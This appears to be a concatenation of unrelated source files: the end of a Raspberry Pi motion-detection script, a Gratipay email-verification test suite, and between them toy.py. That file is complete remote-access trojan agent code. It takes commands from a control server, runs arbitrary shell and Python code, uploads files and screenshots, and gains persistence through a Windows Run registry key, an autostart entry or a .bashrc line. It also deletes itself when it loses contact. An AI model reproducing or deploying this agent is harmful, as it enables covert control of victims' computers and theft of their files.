img = picam.takePhotoWithDetails(width,height, 85)
img.save(stream,'JPEG', quality=70)
m_tornado.WSHandler.wsSend('[5]')
m_tornado.WSHandler.wsSend(stream.getvalue(),binary=True)
stream.seek(0)
def testWriteBinRgb(rgbIntList):
if m_tornado.WSHandler.wsClients() > 0:
m_tornado.WSHandler.wsSend('[6]')
bytearr = bytearray()
for rgb in rgbIntList:
rarr = [ ord(c) for c in struct.pack("I", rgb) ]
# return [R,G,B,0]
bytearr.append(rarr[0])
bytearr.append(rarr[1])
bytearr.append(rarr[2])
m_tornado.WSHandler.wsSend(bytes(bytearr),binary=True)
def runDiffCheck():
k = collections.deque(maxlen=4)
THRESHOLD = 15
QUANITY_MIN = 50
f1 = picam.takeRGBPhotoWithDetails(width, height)
while True:
f2 = picam.takeRGBPhotoWithDetails(width, height)
m_tornado.WSHandler.wsSend(json.dumps(f2))
(m, q) = picam.difference(f1, f2, THRESHOLD)
testWriteBinRgb(m)
if q > 10 : logging.debug("px=%d", q)
k.append(q)
# print 'px %d' %q
msg = []
msg.append(q)
msg.append(m)
m_tornado.WSHandler.wsSend(json.dumps(msg))
testWriteBinJpeg()
picam.LEDOn() if q > QUANITY_MIN else picam.LEDOff()
handleMotion(k, q)
f1 = f2
if __name__ == '__main__':
main()
|
toy.py
|
#!/usr/bin/env python2
# coding: utf-8
import requests
import time
import os
import subprocess
import platform
import shutil
import sys
import traceback
import threading
import uuid
import StringIO
import zipfile
import tempfile
import socket
import getpass
if os.name == 'nt':
from PIL import ImageGrab
else:
import pyscreenshot as ImageGrab
import config
def threaded(func):
def wrapper(*_args, **kwargs):
t = threading.Thread(target=func, args=_args)
t.start()
return
return wrapper
class Agent(object):
def __init__(self):
self.idle = True
self.silent = False
self.platform = platform.system() + " " + platform.release()
self.last_active = time.time()
self.failed_connections = 0
self.uid = self.get_UID()
self.hostname = socket.gethostname()
self.username = getpass.getuser()
def get_install_dir(self):
install_dir = None
if platform.system() == 'Linux':
install_dir = self.expand_path('~/.ares')
elif platform.system() == 'Windows':
install_dir = os.path.join(os.getenv('USERPROFILE'), 'ares')
if os.path.exists(install_dir):
return install_dir
else:
return None
def is_installed(self):
return self.get_install_dir()
def get_consecutive_failed_connections(self):
if self.is_installed():
install_dir = self.get_install_dir()
check_file = os.path.join(install_dir, "failed_connections")
if os.path.exists(check_file):
with open(check_file, "r") as f:
return int(f.read())
else:
return 0
else:
return self.failed_connections
def update_consecutive_failed_connections(self, value):
if self.is_installed():
install_dir = self.get_install_dir()
check_file = os.path.join(install_dir, "failed_connections")
with open(check_file, "w") as f:
f.write(str(value))
else:
self.failed_connections = value
def log(self, to_log):
""" Write data to agent log """
print(to_log)
def get_UID(self):
""" Returns a unique ID for the agent """
return getpass.getuser() + "_" + str(uuid.getnode())
def server_hello(self):
""" Ask servuuid.getnode()er for instructions """
req = requests.post(config.SERVER + '/api/' + self.uid + '/hello',
json={'platform': self.platform, 'hostname': self.hostname, 'username': self.username})
return req.text
def send_output(self, output, newlines=True):
""" Send console output to server """
if self.silent:
self.log(output)
return
if not output:
return
if newlines:
output += "\n\n"
req = requests.post(config.SERVER + '/api/' + self.uid + '/report',
data={'output': output})
def expand_path(self, path):
""" Expand environment variables and metacharacters in a path """
return os.path.expandvars(os.path.expanduser(path))
@threaded
def runcmd(self, cmd):
""" Runs a shell command and returns its output """
try:
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
output = (out + err)
self.send_output(output)
except Exception as exc:
self.send_output(traceback.format_exc())
@threaded
def python(self, command_or_file):
""" Runs a python command or a python file and returns the output """
new_stdout = StringIO.StringIO()
old_stdout = sys.stdout
sys.stdout = new_stdout
new_stderr = StringIO.StringIO()
old_stderr = sys.stderr
sys.stderr = new_stderr
if os.path.exists(command_or_file):
self.send_output("[*] Running python file...")
with open(command_or_file, 'r') as f:
python_code = f.read()
try:
exec(python_code)
except Exception as exc:
self.send_output(traceback.format_exc())
else:
self.send_output("[*] Running python command...")
try:
exec(command_or_file)
except Exception as exc:
self.send_output(traceback.format_exc())
sys.stdout = old_stdout
sys.stderr = old_stderr
self.send_output(new_stdout.getvalue() + new_stderr.getvalue())
def cd(self, directory):
""" Change current directory """
os.chdir(self.expand_path(directory))
@threaded
def upload(self, file):
""" Uploads a local file to the server """
file = self.expand_path(file)
try:
if os.path.exists(file) and os.path.isfile(file):
self.send_output("[*] Uploading %s..." % file)
requests.post(config.SERVER + '/api/' + self.uid + '/upload',
files={'uploaded': open(file, 'rb')})
else:
self.send_output('[!] No such file: ' + file)
except Exception as exc:
self.send_output(traceback.format_exc())
@threaded
def download(self, file, destination=''):
""" Downloads a file the the agent host through HTTP(S) """
try:
destination = self.expand_path(destination)
if not destination:
destination= file.split('/')[-1]
self.send_output("[*] Downloading %s..." % file)
req = requests.get(file, stream=True)
with open(destination, 'wb') as f:
for chunk in req.iter_content(chunk_size=8000):
if chunk:
f.write(chunk)
self.send_output("[+] File downloaded: " + destination)
except Exception as exc:
self.send_output(traceback.format_exc())
def persist(self):
""" Installs the agent """
if not getattr(sys, 'frozen', False):
self.send_output('[!] Persistence only supported on compiled agents.')
return
if self.is_installed():
self.send_output('[!] Agent seems to be already installed.')
return
if platform.system() == 'Linux':
persist_dir = self.expand_path('~/.ares')
if not os.path.exists(persist_dir):
os.makedirs(persist_dir)
agent_path = os.path.join(persist_dir, os.path.basename(sys.executable))
shutil.copyfile(sys.executable, agent_path)
os.system('chmod +x ' + agent_path)
if os.path.exists(self.expand_path("~/.config/autostart/")):
desktop_entry = "[Desktop Entry]\nVersion=1.0\nType=Application\nName=Ares\nExec=%s\n" % agent_path
with open(self.expand_path('~/.config/autostart/ares.desktop'), 'w') as f:
f.write(desktop_entry)
else:
with open(self.expand_path("~/.bashrc"), "a") as f:
f.write("\n(if [ $(ps aux|grep " + os.path.basename(sys.executable) + "|wc -l) -lt 2 ]; then " + agent_path + ";fi&)\n")
elif platform.system() == 'Windows':
persist_dir = os.path.join(os.getenv('USERPROFILE'), 'ares')
if not os.path.exists(persist_dir):
os.makedirs(persist_dir)
agent_path = os.path.join(persist_dir, os.path.basename(sys.executable))
shutil.copyfile(sys.executable, agent_path)
cmd = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v ares /t REG_SZ /d \"%s\"" % agent_path
subprocess.Popen(cmd, shell=True)
self.send_output('[+] Agent installed.')
def clean(self):
""" Uninstalls the agent """
if platform.system() == 'Linux':
persist_dir = self.expand_path('~/.ares')
if os.path.exists(persist_dir):
shutil.rmtree(persist_dir)
desktop_entry = self.expand_path('~/.config/autostart/ares.desktop')
if os.path.exists(desktop_entry):
os.remove(desktop_entry)
os.system("grep -v .ares .bashrc > .bashrc.tmp;mv .bashrc.tmp .bashrc")
elif platform.system() == 'Windows':
persist_dir = os.path.join(os.getenv('USERPROFILE'), 'ares')
cmd = "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v ares"
subprocess.Popen(cmd, shell=True)
cmd = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v ares /t REG_SZ /d \"cmd.exe /c del /s /q %s & rmdir %s\"" % (persist_dir, persist_dir)
subprocess.Popen(cmd, shell=True)
self.send_output('[+] Agent removed successfully.')
def exit(self):
""" Kills the agent """
self.send_output('[+] Exiting... (bye!)')
sys.exit(0)
@threaded
def zip(self, zip_name, to_zip):
""" Zips a folder or file """
try:
zip_name = self.expand_path(zip_name)
to_zip = self.expand_path(to_zip)
if not os.path.exists(to_zip):
self.send_output("[+] No such file or directory: %s" % to_zip)
return
self.send_output("[*] Creating zip archive...")
zip_file = zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED)
if os.path.isdir(to_zip):
relative_path = os.path.dirname(to_zip)
for root, dirs, files in os.walk(to_zip):
for file in files:
zip_file.write(os.path.join(root, file), os.path.join(root, file).replace(relative_path, '', 1))
else:
zip_file.write(to_zip, os.path.basename(to_zip))
zip_file.close()
self.send_output("[+] Archive created: %s" % zip_name)
except Exception as exc:
self.send_output(traceback.format_exc())
@threaded
def screenshot(self):
""" Takes a screenshot and uploads it to the server"""
screenshot = ImageGrab.grab()
tmp_file = tempfile.NamedTemporaryFile()
screenshot_file = tmp_file.name + ".png"
tmp_file.close()
screenshot.save(screenshot_file)
self.upload(screenshot_file)
def help(self):
""" Displays the help """
self.send_output(config.HELP)
def run(self):
""" Main loop """
self.silent = True
if config.PERSIST:
try:
self.persist()
except:
self.log("Failed executing persistence")
self.silent = False
while True:
try:
todo = self.server_hello()
self.update_consecutive_failed_connections(0)
# Something to do ?
if todo:
commandline = todo
self.idle = False
self.last_active = time.time()
self.send_output('$ ' + commandline)
split_cmd = commandline.split(" ")
command = split_cmd[0]
args = []
if len(split_cmd) > 1:
args = split_cmd[1:]
try:
if command == 'cd':
if not args:
self.send_output('usage: cd </path/to/directory>')
else:
self.cd(args[0])
elif command == 'upload':
if not args:
self.send_output('usage: upload <localfile>')
else:
self.upload(args[0],)
elif command == 'download':
if not args:
self.send_output('usage: download <remote_url> <destination>')
else:
if len(args) == 2:
self.download(args[0], args[1])
else:
self.download(args[0])
elif command == 'clean':
self.clean()
elif command == 'persist':
self.persist()
elif command == 'exit':
self.exit()
elif command == 'zip':
if not args or len(args) < 2:
self.send_output('usage: zip <archive_name> <folder>')
else:
self.zip(args[0], " ".join(args[1:]))
elif command == 'python':
if not args:
self.send_output('usage: python <python_file> or python <python_command>')
else:
self.python(" ".join(args))
elif command == 'screenshot':
self.screenshot()
elif command == 'help':
self.help()
else:
self.runcmd(commandline)
except Exception as exc:
self.send_output(traceback.format_exc())
else:
if self.idle:
time.sleep(config.HELLO_INTERVAL)
elif (time.time() - self.last_active) > config.IDLE_TIME:
self.log("Switching to idle mode...")
self.idle = True
else:
time.sleep(0.5)
except Exception as exc:
self.log(traceback.format_exc())
failed_connections = self.get_consecutive_failed_connections()
failed_connections += 1
self.update_consecutive_failed_connections(failed_connections)
self.log("Consecutive failed connections: %d" % failed_connections)
if failed_connections > config.MAX_FAILED_CONNECTIONS:
self.silent = True
self.clean()
self.exit()
time.sleep(config.HELLO_INTERVAL)
def main():
agent = Agent()
agent.run()
if __name__ == "__main__":
main()
|
test_participant_emails.py
|
from __future__ import absolute_import, division, print_function, unicode_literals
import json
import Queue
import sys
import threading
import urllib
import mock
from pytest import raises
from gratipay.exceptions import CannotRemovePrimaryEmail, EmailTaken, EmailNotVerified
from gratipay.exceptions import TooManyEmailAddresses, Throttled, EmailAlreadyVerified
from gratipay.exceptions import EmailNotOnFile, ProblemChangingEmail
from gratipay.testing import P, Harness
from gratipay.testing.email import QueuedEmailHarness
from gratipay.models.package import NPM, Package
from gratipay.models.participant import email as _email
from gratipay.utils import encode_for_querystring
from gratipay.cli import queue_branch_email as _queue_branch_email
class Alice(QueuedEmailHarness):
def setUp(self):
QueuedEmailHarness.setUp(self)
self.alice = self.make_participant('alice', claimed_time='now')
def add(self, participant, address, _flush=False):
participant.start_email_verification(address)
nonce = participant.get_email(address).nonce
result = participant.finish_email_verification(address, nonce)
assert result == (_email.VERIFICATION_SUCCEEDED, [], None)
if _flush:
self.app.email_queue.flush()
class TestEndpoints(Alice):
def hit_email_spt(self, action, address, user='alice', package_ids=[], should_fail=False):
f = self.client.PxST if should_fail else self.client.POST
# Aspen's test client should really support URL-encoding POST data for
# us, but it doesn't (it only supports multipart, which I think maybe
# doesn't work because of other Aspen bugs around multiple package_id
# values in the same POST body in that case?), so let's do that
# ourselves.
data = [ ('action', action)
, ('address', address)
] + [('package_id', str(p)) for p in package_ids]
body = urllib.urlencode(data)
response = f( '/~alice/emails/modify.json'
, body=body
, content_type=b'application/x-www-form-urlencoded'
, auth_as=user
, HTTP_ACCEPT_LANGUAGE=b'en'
)
if issubclass(response.__class__, (ProblemChangingEmail, Throttled)):
response.render_body({'_': lambda a: a})
return response
def hit_verify_spt(self, email, nonce, username='alice', should_fail=False):
# Email address is encoded in url.
url = '/~%s/emails/verify.html?email=%s&nonce=%s'
url %= (username, encode_for_querystring(email), nonce)
f = self.client.GxT if should_fail else self.client.GET
return f(url, auth_as=username)
def verify_and_change_email(self, old_email, new_email, username='alice', _flush=True):
self.hit_email_spt('add-email', old_email)
nonce = P(username).get_email(old_email).nonce
self.hit_verify_spt(old_email, nonce)
self.hit_email_spt('add-email', new_email)
if _flush:
self.app.email_queue.flush()
def test_participant_can_start_email_verification(self):
response = self.hit_email_spt('add-email', 'alice@gratipay.com')
assert json.loads(response.body) == 'Check your inbox for a verification link.'
def test_starting_email_verification_triggers_verification_email(self):
self.hit_email_spt('add-email', 'alice@gratipay.com')
assert self.count_email_messages() == 1
last_email = self.get_last_email()
assert last_email['to'] == 'alice <alice@gratipay.com>'
expected = "We've received a request to connect alice@gratipay.com to the alice account"
assert expected in last_email['body_text']
def test_email_address_is_encoded_in_sent_verification_link(self):
address = 'alice@gratipay.com'
encoded = encode_for_querystring(address)
self.hit_email_spt('add-email', address)
last_email = self.get_last_email()
assert "~alice/emails/verify.html?email="+encoded in last_email['body_text']
def test_verification_email_doesnt_contain_unsubscribe(self):
self.hit_email_spt('add-email', 'alice@gratipay.com')
last_email = self.get_last_email()
assert "To stop receiving" not in last_email['body_text']
def test_verifying_second_email_sends_verification_notice(self):
self.verify_and_change_email('alice1@example.com', 'alice2@example.com', _flush=False)
assert self.count_email_messages() == 3
last_email = self.get_last_email()
self.app.email_queue.flush()
assert last_email['to'] == 'alice <alice1@example.com>'
expected = "We are connecting alice2@example.com to the alice account on Gratipay"
assert expected in last_email['body_text']
def test_post_anon_returns_401(self):
response = self.hit_email_spt('add-email', 'anon@example.com', user=None, should_fail=True)
assert response.code == 401
def test_post_with_no_at_symbol_is_400(self):
response = self.hit_email_spt('add-email', 'gratipay.com', should_fail=True)
assert response.code == 400
def test_post_with_no_period_symbol_is_400(self):
response = self.hit_email_spt('add-email', 'test@gratipay', should_fail=True)
assert response.code == 400
def test_post_with_long_address_is_okay(self):
response = self.hit_email_spt('add-email', ('a'*242) + '@example.com')
assert response.code == 200
def test_post_with_looooong_address_is_400(self):
response = self.hit_email_spt('add-email', ('a'*243) + '@example.com', should_fail=True)
assert response.code == 400
def test_post_too_quickly_is_400(self):
self.hit_email_spt('add-email', 'alice@example.com')
self.hit_email_spt('add-email', 'alice+a@example.com')
self.hit_email_spt('add-email', 'alice+b@example.com')
response = self.hit_email_spt('add-email', 'alice+c@example.com', should_fail=True)
assert response.code == 400
assert 'too quickly' in response.body
def test_verify_email_without_adding_email(self):
response = self.hit_verify_spt('', 'sample-nonce')
assert 'Bad Info' in response.body
def test_verify_email_wrong_nonce(self):
self.hit_email_spt('add-email', 'alice@example.com')
nonce = 'fake-nonce'
result = self.alice.finish_email_verification('alice@gratipay.com', nonce)
assert result == (_email.VERIFICATION_FAILED, None, None)
self.hit_verify_spt('alice@example.com', nonce)
expected = None
actual = P('alice').email_address
assert expected == actual
def test_verify_email_a_second_time_returns_redundant(self):
address = 'alice@example.com'
self.hit_email_spt('add-email', address)
nonce = self.alice.get_email(address).nonce
self.alice.finish_email_verification(address, nonce)
result = self.alice.finish_email_verification(address, nonce)
assert result == (_email.VERIFICATION_REDUNDANT, None, None)
def test_verify_email_expired_nonce_fails(self):
address = 'alice@example.com'
self.hit_email_spt('add-email', address)
self.db.run("""
UPDATE email_addresses
SET verification_start = (now() - INTERVAL '25 hours')
WHERE participant_id = %s;
""", (self.alice.id,))
nonce = self.alice.get_email(address).nonce
result = self.alice.finish_email_verification(address, nonce)
assert result == (_email.VERIFICATION_FAILED, None, None)
actual = P('alice').email_address
assert actual == None
def test_finish_email_verification(self):
self.hit_email_spt('add-email', 'alice@example.com')
nonce = self.alice.get_email('alice@example.com').nonce
assert self.hit_verify_spt('alice@example.com', nonce).code == 200
assert P('alice').email_address == 'alice@example.com'
def test_empty_email_fails(self):
for empty in ('', ' '):
result = self.alice.finish_email_verification(empty, 'foobar')
assert result == (_email.VERIFICATION_FAILED, None, None)
def test_empty_nonce_fails(self):
for empty in ('', ' '):
result = self.alice.finish_email_verification('foobar', empty)
assert result == (_email.VERIFICATION_FAILED, None, None)
def test_email_verification_is_backwards_compatible(self):
"""Test email verification still works with 'email2' field in verification link.
"""
username = 'alice'
email = 'alice@example.com'
self.hit_email_spt('add-email', email)
nonce = self.alice.get_email(email).nonce
url = '/~%s/emails/verify.html?email2=%s&nonce=%s'
url %= (username, encode_for_querystring(email), nonce)
self.client.GET(url, auth_as=username)
expected = email
actual = P(username).email_address
assert expected == actual
def test_verified_email_is_not_changed_after_update(self):
self.verify_and_change_email('alice@example.com', 'alice@example.net')
expected = 'alice@example.com'
actual = P('alice').email_address
assert expected == actual
def test_get_emails(self):
self.verify_and_change_email('alice@example.com', 'alice@example.net')
emails = self.alice.get_emails()
assert len(emails) == 2
def test_verify_email_after_update(self):
self.verify_and_change_email('alice@example.com', 'alice@example.net')
nonce = self.alice.get_email('alice@example.net').nonce
self.hit_verify_spt('alice@example.net', nonce)
expected = 'alice@example.com'
actual = P('alice').email_address
assert expected == actual
def test_nonce_is_not_reused_when_resending_email(self):
self.hit_email_spt('add-email', 'alice@example.com')
nonce1 = self.alice.get_email('alice@example.com').nonce
self.hit_email_spt('resend', 'alice@example.com')
nonce2 = self.alice.get_email('alice@example.com').nonce
assert nonce1 != nonce2
def test_emails_page_shows_emails(self):
self.verify_and_change_email('alice@example.com', 'alice@example.net')
body = self.client.GET("/~alice/emails/", auth_as="alice").body
assert 'alice@example.com' in body
assert 'alice@example.net' in body
def test_set_primary(self):
self.verify_and_change_email('alice@example.com', 'alice@example.net')
self.verify_and_change_email('alice@example.net', 'alice@example.org')
self.hit_email_spt('set-primary', 'alice@example.com')
def test_cannot_set_primary_to_unverified(self):
with self.assertRaises(EmailNotVerified):
self.hit_email_spt('set-primary', 'alice@example.com')
def test_remove_email(self):
# Can remove unverified
self.hit_email_spt('add-email', 'alice@example.com')
self.hit_email_spt('remove', 'alice@example.com')
# Can remove verified
self.verify_and_change_email('alice@example.com', 'alice@example.net')
self.verify_and_change_email('alice@example.net', 'alice@example.org')
self.hit_email_spt('remove', 'alice@example.net')
# Cannot remove primary
with self.assertRaises(CannotRemovePrimaryEmail):
self.hit_email_spt('remove', 'alice@example.com')
def test_participant_can_verify_a_package_along_with_email(self):
foo = self.make_package(name='foo', emails=['alice@gratipay.com'])
response = self.hit_email_spt( 'start-verification'
, 'alice@gratipay.com'
, package_ids=[foo.id]
)
assert json.loads(response.body) == 'Check your inbox for a verification link.'
assert self.db.all('select package_id from claims order by package_id') == [foo.id]
def test_participant_cant_verify_packages_with_add_email_or_resend(self):
foo = self.make_package(name='foo', emails=['alice@gratipay.com'])
for action in ('add-email', 'resend'):
assert self.hit_email_spt( action
, 'alice@gratipay.com'
, package_ids=[foo.id]
, should_fail=True
).code == 400
def test_participant_can_verify_multiple_packages_along_with_email(self):
package_ids = [self.make_package(name=name, emails=['alice@gratipay.com']).id
for name in ('foo', 'bar', 'baz', 'buz')]
response = self.hit_email_spt( 'start-verification'
, 'alice@gratipay.com'
, package_ids=package_ids
)
assert json.loads(response.body) == 'Check your inbox for a verification link.'
assert self.db.all('select package_id from claims order by package_id') == package_ids
def test_package_verification_fails_if_email_not_listed(self):
foo = self.make_package()
response = self.hit_email_spt( 'start-verification'
, 'bob@gratipay.com'
, package_ids=[foo.id]
, should_fail=True
)
assert response.code == 400
assert self.db.all('select package_id from claims order by package_id') == []
def test_package_verification_fails_if_package_id_is_garbage(self):
response = self.hit_email_spt( 'start-verification'
, 'bob@gratipay.com'
, package_ids=['cheese monkey']
, should_fail=True
)
assert response.code == 400
assert self.db.all('select package_id from claims order by package_id') == []
def test_package_reverification_succeeds_if_package_is_already_claimed_by_self(self):
foo = self.make_package()
self.claim_package('alice', foo)
response = self.hit_email_spt( 'start-verification'
, 'alice@example.com'
, package_ids=[foo.id]
)
assert response.code == 200
def test_package_verification_fails_if_package_is_already_claimed_by_other(self):
self.make_participant('bob', claimed_time='now', email_address='bob@example.com')
foo = self.make_package(emails=['alice@example.com', 'bob@example.com'])
self.claim_package('bob', foo)
response = self.hit_email_spt( 'start-verification'
, 'alice@example.com'
, package_ids=[foo.id]
, should_fail=True
)
assert response.code == 400
class TestFunctions(Alice):
def test_cannot_update_email_to_already_verified(self):
bob = self.make_participant('bob', claimed_time='now')
self.add(self.alice, 'alice@gratipay.com')
with self.assertRaises(EmailTaken):
bob.start_email_verification('alice@gratipay.com')
nonce = bob.get_email('alice@gratipay.com').nonce
bob.finish_email_verification('alice@gratipay.com', nonce)
email_alice = P('alice').email_address
assert email_alice == 'alice@gratipay.com'
def test_html_escaping(self):
self.alice.start_email_verification("foo'bar@example.com")
last_email = self.get_last_email()
assert 'foo'bar' in last_email['body_html']
assert ''' not in last_email['body_text']
def test_npm_package_name_is_handled_safely(self):
foo = self.make_package(name='<script>')
self.alice.start_email_verification("alice@example.com", foo)
last_email = self.get_last_email()
assert '<b><script></b>' in last_email['body_html']
assert '<script>' in last_email['body_text']
class TestGetRecentlyActiveParticipants(QueuedEmailHarness):
def check(self):
return _queue_branch_email.get_recently_active_participants(self.db)
def test_gets_recently_active_participants(self):
alice = self.make_participant_with_exchange('alice')
assert self.check() == [alice]
def test_ignores_participants_with_no_exchanges(self):
self.make_participant('alice', claimed_time='now', email_address='a@example.com')
assert self.check() == []
def test_ignores_participants_with_no_recent_exchanges(self):
self.make_participant_with_exchange('alice')
self.db.run("UPDATE exchanges SET timestamp = timestamp - '181 days'::interval")
assert self.check() == []
def test_keeps_participants_straight(self):
alice = self.make_participant_with_exchange('alice')
bob = self.make_participant_with_exchange('bob')
self.make_participant_with_exchange('carl')
self.db.run("UPDATE exchanges SET timestamp = timestamp - '181 days'::interval "
"WHERE participant='carl'")
self.make_participant('dana', claimed_time='now', email_address='d@example.com')
assert self.check() == [alice, bob]
class TestQueueBranchEmail(QueuedEmailHarness):
def queue_branch_email(self, username, _argv=None, _input=None, _print=None):
_argv = ['', username] if _argv is None else _argv
_input = _input or (lambda prompt: 'y')
stdout, stderr = [], []
def _print(string, file=None):
buf = stderr if file is sys.stderr else stdout
buf.append(str(string))
_print = _print or (lambda *a, **kw: None)
try:
_queue_branch_email.main(_argv, _input, _print, self.app)
except SystemExit as exc:
retcode = exc.args[0]
else:
retcode = 0
return retcode, stdout, stderr
def test_is_fine_with_no_participants(self):
retcode, output, errors = self.queue_branch_email('all')
assert retcode == 0
assert output == ['Okay, you asked for it!', '0']
assert errors == []
assert self.count_email_messages() == 0
def test_queues_for_one_participant(self):
alice = self.make_participant_with_exchange('alice')
retcode, output, errors = self.queue_branch_email('all')
assert retcode == 0
assert output == [ 'Okay, you asked for it!'
, '1'
, 'spotcheck: alice@example.com (alice={})'.format(alice.id)
]
assert errors == [' 1 queuing for alice@example.com (alice={})'.format(alice.id)]
assert self.count_email_messages() == 1
def test_queues_for_two_participants(self):
alice = self.make_participant_with_exchange('alice')
bob = self.make_participant_with_exchange('bob')
retcode, output, errors = self.queue_branch_email('all')
assert retcode == 0
assert output[:2] == ['Okay, you asked for it!', '2']
assert errors == [ ' 1 queuing for alice@example.com (alice={})'.format(alice.id)
, ' 2 queuing for bob@example.com (bob={})'.format(bob.id)
]
assert self.count_email_messages() == 2
def test_constrains_to_one_participant(self):
self.make_participant_with_exchange('alice')
bob = self.make_participant_with_exchange('bob')
retcode, output, errors = self.queue_branch_email('bob')
assert retcode == 0
assert output == [ 'Okay, just bob.'
, '1'
, 'spotcheck: bob@example.com (bob={})'.format(bob.id)
]
assert errors == [' 1 queuing for bob@example.com (bob={})'.format(bob.id)]
assert self.count_email_messages() == 1
def test_bails_if_told_to(self):
retcode, output, errors = self.queue_branch_email('all', _input=lambda prompt: 'n')
assert retcode == 1
assert output == []
assert errors == []
assert self.count_email_messages() == 0
class StartEmailVerification(Alice):
def test_starts_email_verification(self):
self.alice.start_email_verification('alice@example.com')
assert self.get_last_email()['subject'] == 'Connect to alice on Gratipay?'
def test_raises_if_already_verified(self):
self.add(self.alice, 'alice@example.com')
raises(EmailAlreadyVerified, self.alice.start_email_verification, 'alice@example.com')
def test_raises_if_already_taken(self):
self.add(self.alice, 'alice@example.com')
bob = self.make_participant('bob', claimed_time='now')
raises(EmailTaken, bob.start_email_verification, 'alice@example.com')
def test_maxes_out_at_10(self):
for i in range(10):
self.add(self.alice, 'alice-{}@example.com'.format(i), _flush=True)
raises(TooManyEmailAddresses, self.alice.start_email_verification, 'alice@example.com')
def test_can_include_packages_in_verification(self):
foo = self.make_package()
self.alice.start_email_verification('alice@example.com', foo)
assert self.get_last_email()['subject'] == 'Connect to alice on Gratipay?'
assert self.db.one('select package_id from claims') == foo.id
def test_can_claim_package_even_when_address_already_verified(self):
self.add(self.alice, 'alice@example.com')
foo = self.make_package()
self.alice.start_email_verification('alice@example.com', foo)
assert self.get_last_email()['subject'] == 'Connect to alice on Gratipay?'
assert self.db.one('select package_id from claims') == foo.id
def test_claiming_package_with_verified_address_doesnt_count_against_max(self):
for i in range(10):
self.add(self.alice, 'alice-{}@example.com'.format(i), _flush=True)
foo = self.make_package(emails=['alice-4@example.com'])
self.alice.start_email_verification('alice-4@example.com', foo)
assert self.db.one('select package_id from claims') == foo.id
def test_claiming_package_with_someone_elses_verified_address_is_a_no_go(self):
self.add(self.alice, 'alice@example.com')
bob = self.make_participant('bob', claimed_time='now')
foo = self.make_package()
raises(EmailTaken, bob.start_email_verification, 'alice@example.com', foo)
def test_claiming_package_with_an_address_not_on_file_is_a_no_go(self):
foo = self.make_package(emails=['bob@example.com'])
raises(EmailNotOnFile, self.alice.start_email_verification, 'alice@example.com', foo)
def test_restarting_verification_clears_old_claims(self):
foo = self.make_package()
_start = lambda: self.alice.start_email_verification('alice@example.com', foo)
_nonce = lambda: self.db.one('select nonce from claims')
_start()
nonce = _nonce()
_start()
result = self.alice.finish_email_verification('alice@example.com', nonce)
assert result == (_email.VERIFICATION_FAILED, None, None)
assert nonce != _nonce()
def test_restarting_verification_also_clears_old_claims_when_address_preverified(self):
foo = self.make_package()
self.add_and_verify_email(self.alice, 'alice@example.com')
_start = lambda: self.alice.start_email_verification('alice@example.com', foo)
_nonce = lambda: self.db.one('select nonce from claims')
_start()
nonce = _nonce()
_start()
result = self.alice.finish_email_verification('alice@example.com', nonce)
assert result == (_email.VERIFICATION_FAILED, None, None)
assert nonce != _nonce()
def test_finishing_verification_clears_competing_claims_and_emails(self):
bob = self.make_participant('bob', claimed_time='now')
foo = self.make_package()
self.alice.start_email_verification('alice@example.com', foo)
anonce = self.alice.get_emails()[0].nonce
bob.start_email_verification('alice@example.com', foo)
bnonce = bob.get_emails()[0].nonce
_emails = lambda: self.db.all('select participant_id as i from email_addresses order by i')
_claims = lambda: dict(self.db.all('select nonce, package_id from claims'))
assert _claims() == {anonce: foo.id, bnonce: foo.id}
assert _emails() == [self.alice.id, bob.id]
result = self.alice.finish_email_verification('alice@example.com', anonce)
assert result == (_email.VERIFICATION_SUCCEEDED, [foo], True)
assert _claims() == {}
assert _emails() == [self.alice.id]
result = bob.finish_email_verification('alice@example.com', bnonce)
assert result == (_email.VERIFICATION_FAILED, None, None)
class RemoveEmail(Alice):
def test_removing_email_clears_claims(self):
foo = self.make_package()
self.alice.start_email_verification('alice@example.com', foo)
_claims = lambda: self.db.all('select package_id from claims')
assert _claims() == [foo.id]
self.alice.remove_email('alice@example.com')
assert _claims() == []
class GetEmailVerificationLink(Harness):
def get_claims(self):
return self.db.all('''
SELECT name
FROM claims c
JOIN packages p
ON c.package_id = p.id
ORDER BY name
''')
def test_returns_a_link(self):
with self.db.get_cursor() as c:
alice = self.make_participant('alice')
link = alice.get_email_verification_link(c, 'alice@example.com')
assert link.startswith('/~alice/emails/verify.html?email=YWxpY2VAZXhhbXBsZS5jb20~&nonce=')
def test_makes_no_claims_by_default(self):
with self.db.get_cursor() as c:
self.make_participant('alice').get_email_verification_link(c, 'alice@example.com')
assert self.get_claims() == []
def test_makes_a_claim_if_asked_to(self):
alice = self.make_participant('alice')
foo = self.make_package()
with self.db.get_cursor() as c:
alice.get_email_verification_link(c, 'alice@example.com', foo)
assert self.get_claims() == ['foo']
def test_can_make_two_claims(self):
alice = self.make_participant('alice')
foo = self.make_package()
bar = self.make_package(name='bar')
with self.db.get_cursor() as c:
alice.get_email_verification_link(c, 'alice@example.com', foo, bar)
assert self.get_claims() == ['bar', 'foo']
def test_will_happily_make_competing_claims(self):
foo = self.make_package()
with self.db.get_cursor() as c:
self.make_participant('alice').get_email_verification_link(c, 'alice@example.com', foo)
with self.db.get_cursor() as c:
self.make_participant('bob').get_email_verification_link(c, 'bob@example.com', foo)
assert self.get_claims() == ['foo', 'foo']
def test_adds_events(self):
foo = self.make_package()
with self.db.get_cursor() as c:
self.make_participant('alice').get_email_verification_link(c, 'alice@example.com', foo)
events = [e.payload['action'] for e in self.db.all('select * from events order by id')]
assert events == ['add', 'start-claim']
class VerificationBase(Alice):
def check(self, *package_names, **kw):
packages = [self.make_package(name=n) for n in package_names]
self.alice.start_email_verification('alice@example.com', *packages)
message = self.get_last_email()
return message['subject'], message['body_html'], message['body_text']
def preverify(self, address='alice@example.com'):
self.alice.start_email_verification(address)
nonce = self.alice.get_email(address).nonce
self.alice.finish_email_verification(address, nonce)
class VerificationMessage(VerificationBase):
def check(self, *a, **kw):
subject, html, text = VerificationBase.check(self, *a, **kw)
assert subject == 'Connect to alice on Gratipay?'
return html, text
def test_chokes_on_just_verified_address(self):
self.preverify()
raises(EmailAlreadyVerified, self.check)
def test_handles_just_address(self):
html, text = self.check()
assert ' connect <b>alice@example.com</b> to ' in html
